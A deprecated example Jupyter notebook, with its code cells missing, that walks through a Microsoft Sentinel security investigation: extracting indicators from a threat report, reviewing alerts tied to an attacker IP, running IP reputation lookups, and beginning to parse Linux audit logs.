Path: blob/master/tutorials-and-examples/deprecated-notebooks/Example - Step-by-Step Linux-Windows-Office Investigation.ipynb
3253 views
Title: Sample Hunting and Investigation in Jupyter
Linux, Windows, Network and Office data
Notebook Version: 1.0
[Platform Requirements[(#platform_reqs)
Description:
This is an example notebook demonstrating techniques to trace the path of an attacker in an organization. Most of the steps use relatively simple Log Analytics queries but it also includes a few more advanced procedures such as:
Unpacking and decoding Linux Audit logs
Clustering events to collapse repetitive items
Various visualizations
Technically, the narrative in this notebook is more an investigation than hunting, since the starting point is an alert rather than threat intelligence. However many of the techniques here - such as investigating process activity on Linux and Windows hosts, establishing intercommication via network analysis - are applicable to hunting scenarios as well.
The Investigation Narrative
From an initial alert (or suspect IP address) examine activity on a Linux host, a Windows and Office subscription. Discover malicious activity related to the ip address in each of these.
Warning: Example Notebook - Not for production use!
This notebooks is meant to be illustrative of specific scenarios and is not actively maintained.It is unlikely to be runnable directly in your environment. Instead, please use the notebooks in the root of this repo.
Table of Contents
Setup
Make sure that you have installed packages specified in the setup (uncomment the lines to execute)
Install Packages
If this is the first time running any of the Microsoft Sentinel notebooks you should run the ConfiguringNotebookEnvironment notebook before continuing with this notebook. If you are just viewing the notebook this is not necessary.
Import Packages
Once packages are installed run the next cell to import them.
Part 1 - Threat Intel Report
Getting IoC IP Addresses
Threat intelligence is a vital tool in the amory of hunters and security investigators. Many companies subscribe to Threat Intelligence feeds from companies like Project Cymru, FireEye, Crowdstrike and others (Microsoft Sentinel customers can make these data subscriptions to enhance their alerts and queries used in Microsoft Sentinel). In other cases your threat intel may arrive via a CERT notification or a random tip-off of activity via email.
For the purposes of this notebook and a desire to make it more accessible to those who don't have ready access to a threat intelligence feed we're going to scrape some threat intelligence Indicators of Compromise (IoCs) from a public report.
Let's pick a recent report from FireEye WinRAR Zero-day Abused in Multiple Campaigns by Dileep Kumar Jallepalli.
The content of this report is not directly relevant to our investigation - we're just using this an example of something that you might receive and want to see if any of the Indicators of Compromise (IoC) listed in the report show up in your organization. I would stress that this is not a recommended way to consume threat intelligence data from FireEye or any other company and is only done here to provide a starting point for the notebook and accompanying blog. For one thing, you may be in violation of terms of service of the company and, for another, the threat intel listed in these types of reports represents a tiny fraction of the data that these companies provide as part of a commercial agreement.
We want to quickly extract relevant IoCs from reports and emails. Although this isn't the original purpose of this module we can use IoCExtract to help us do this.
At this point we're going to cheat a little (I said earlier that the FireEye report was not related to the notebook). We will take the list of IPs from the report and add in the IP Address of our fictonal attacker.
Authenticate to Microsoft Sentinel
Get the Workspace ID
To find your Workspace Id go to Log Analytics. Look at the workspace properties to find the ID.
Read Workspace configuration from local config.json for workspace {{cookiecutter.workspace_name}}
TENANT_ID: 72f988bf-86f1-41af-91ab-2d7cd011db47
SUBSCRIPTION_ID: {{cookiecutter.subscription_id}}
RESOURCE_GROUP: {{cookiecutter.resource_group}}
WORKSPACE_ID: 52b1ab41-869e-4138-9e40-2a4457f09bf0
WORKSPACE_NAME: {{cookiecutter.workspace_name}}
Authenticate to Log Analytics
If you are using user/device authentication, run the following cell.
Click the 'Copy code to clipboard and authenticate' button.
This will pop up an Azure Active Directory authentication dialog (in a new tab or browser window). The device code will have been copied to the clipboard.
Select the text box and paste (Ctrl-V/Cmd-V) the copied value.
You should then be redirected to a user authentication page where you should authenticate with a user account that has permission to query your Log Analytics workspace.
Use the following syntax if you are authenticating using an Azure Active Directory AppId and Secret:
instead of
Note: you may occasionally see a JavaScript error displayed at the end of the authentication - you can safely ignore this.
On successful authentication you should see a popup schema button.
Search for C2
Set Query Time Range
Specify a time range to search for alerts. One this is set run the following cell to retrieve any alerts in that time window. You can change the time range and re-run the queries until you find the alerts that you want.
We can see that we have 14 alerts in that period that match the final IP in the list. Let's have a look at those.
Examine an Alert
Pick an alert from a list of retrieved alerts.
This section extracts the alert information and entities into a SecurityAlert object allowing us to query the properties more reliably.
In particular, we use the alert to automatically provide parameters for queries and UI elements. Subsequent queries will use properties like the host name and derived properties such as the OS family (Linux or Windows) to adapt the query. Query time selectors like the one above will also default to an origin time that matches the alert selected.
The alert view below shows all of the main properties of the alert plus the extended property dictionary (if any) and JSON representations of the Entity.
Select alert from list
As you select an alert, the main properties will be shown below the list.
Use the filter box to narrow down your search to any substring in the AlertName.
Looking at the SSH Anomalous logons we can see our IP address as the origin IP. Looking at the one SuspiciousFileDownload alert, we can see (buried in the Process Entity) that the same IP Address was used as the host address from an http download.
Check alert for IP addresses not contained in entities
Additional IP addresses found in alert are shown below.
Basic IP Checks
Reverse IP and WhoIs
Geo IP Lookup
Where does this communication come from?
Threat Intel - Check the IP Address for known malicious addresses
Lookup in Microsoft Sentinel Bring-Your-Own-Threat-Intel
Lookup in VirusTotal
End of Part 1
We've seen:
how to search for IoCs across the different data sets in Microsoft Sentinel
how to use IoCExtract to pull out observables from arbitrary text
some of the UI helper widgets like query time setting, alert display to help with quickly assembling a useful notebook
how to use the GeoIP lookup and mapping tools
how to use the VirusTotal lookup to check IPs for known malware origins
In the next part we'll focus on one of the hosts that we already know has been communicating with one of the suspect IPs and see if we can confirm this to be a successful attack or not. We'll then go on to see what we can learn from network traffic recorded in some of the other data sets to see if the attack has spread beyond this single host.
Part 2 - See What's going on on the Affected Host - Linux
In the next two sections we will examine the host from where the alert originated. In this case it is a Linux host. While we can get some useful information from standard syslog, we have audit logging configured on our hosts to give us detailed process and logon events.
The only tricky part is that the data is not currently in a very friendly format.
This is a good example of using a combination of LogAnalytics/Kusto process, combined with some local python processing to extract data from arbitrary log types.
Using Linux Audit data to view processes
Linux Audit Logs - To Dos
There are a few things that we need to deal with here:
Splitting and unpacking the fields in each rawdata field
Some events (like process exec) have multiple rows associated with them - we need to join these together into a single row
Some string fields are hex-encoded (this is to allow embedded characters like spaces)
We need also to extract the timestamp from the msg field (this is stored as a Unix timestamp float)